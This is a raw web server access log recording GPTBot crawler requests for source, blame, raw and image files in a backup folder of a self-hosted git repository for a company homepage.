"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:14:36:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13173] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services" +[17/Feb/2026:14:36:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13172] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services" +[17/Feb/2026:14:36:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Services.tsx" +[17/Feb/2026:14:36:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14590] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Services.tsx" +[17/Feb/2026:14:36:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/status.json" [Client 74.7.227.38] [Length 9994] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/status.json" +[17/Feb/2026:14:36:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/status.json" [Client 74.7.227.38] [Length 11044] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup" +[17/Feb/2026:14:36:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Services.tsx" +[17/Feb/2026:14:36:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14591] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Services.tsx" +[17/Feb/2026:14:36:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/status.json" +[17/Feb/2026:14:36:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11960] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" +[17/Feb/2026:14:36:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11962] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" +[17/Feb/2026:14:36:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12971] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services/geminiService.ts" +[17/Feb/2026:14:36:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services/geminiService.ts" +[17/Feb/2026:14:36:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services/geminiService.ts" +[17/Feb/2026:14:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10881] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images" +[17/Feb/2026:14:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html" +[17/Feb/2026:14:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/status.json" +[17/Feb/2026:14:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/status.json" [Client 74.7.227.38] [Length 9995] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/status.json" +[17/Feb/2026:14:36:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699421] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:36:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:36:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/vite.config.ts" +[17/Feb/2026:14:36:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/vite.config.ts" +[17/Feb/2026:14:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11235] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/vite.config.ts" +[17/Feb/2026:14:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11235] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/vite.config.ts" +[17/Feb/2026:14:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/vite.config.ts" +[17/Feb/2026:14:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/vite.config.ts" +[17/Feb/2026:14:36:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10878] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images" +[17/Feb/2026:14:36:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:36:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10882] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images" +[17/Feb/2026:14:36:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10882] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images" +[17/Feb/2026:14:36:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10881] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images" +[17/Feb/2026:14:36:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641823] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:36:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10881] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images" +[17/Feb/2026:14:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10881] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images" +[17/Feb/2026:14:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html" +[17/Feb/2026:14:36:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10881] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images" +[17/Feb/2026:14:36:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10882] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images" +[17/Feb/2026:14:36:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498864] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:36:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:36:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508487] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429965] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:37:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692379] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:14:37:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:37:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:37:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:37:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10878] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images" +[17/Feb/2026:14:37:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images" +[17/Feb/2026:14:37:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9895] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:37:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9895] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 